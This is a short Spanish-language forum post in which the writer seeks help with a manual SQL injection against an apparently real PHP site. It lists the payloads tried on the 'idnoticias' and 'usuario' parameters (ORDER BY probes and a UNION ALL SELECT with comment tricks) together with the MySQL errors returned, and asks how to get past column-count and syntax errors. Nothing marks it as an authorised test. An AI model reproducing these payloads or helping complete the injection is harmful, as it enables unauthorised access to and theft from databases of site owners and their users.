Esto parece que no va, mira:
php?idnoticias=-1 order by 100--
Unknown column '100' in 'order clause'
php?idnoticias= -1 order by 1--
Unknown column '1' in 'order clause'
php?idnoticias=-1 order by 10--
Unknown column '10' in 'order clause'
Ahora bien, si hago esto:
La página carga normalmente, como si no hubiese inyectado...
Nunca lo habia visto, ¿que puede ser?
{MAS INFO}
En otra parte del código, ha funcionado tu técnica. Tiene cuatro columnas, pero a la hora de hacer el UNION ALL SELECT queda asi:
usuario=xxxxx' union all select 1,2,3,4-- +
The used SELECT statements have a different number of columns
NOTESE EL '+' del final por esto:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY fotos.ID DESC' at line 1
De todas formas. ¿Si dice Error en línea 1? Es porque esta en una línea la consulta, ¿no debería ignorarse con '--'?
A ver si saco algo en claro, buff . . .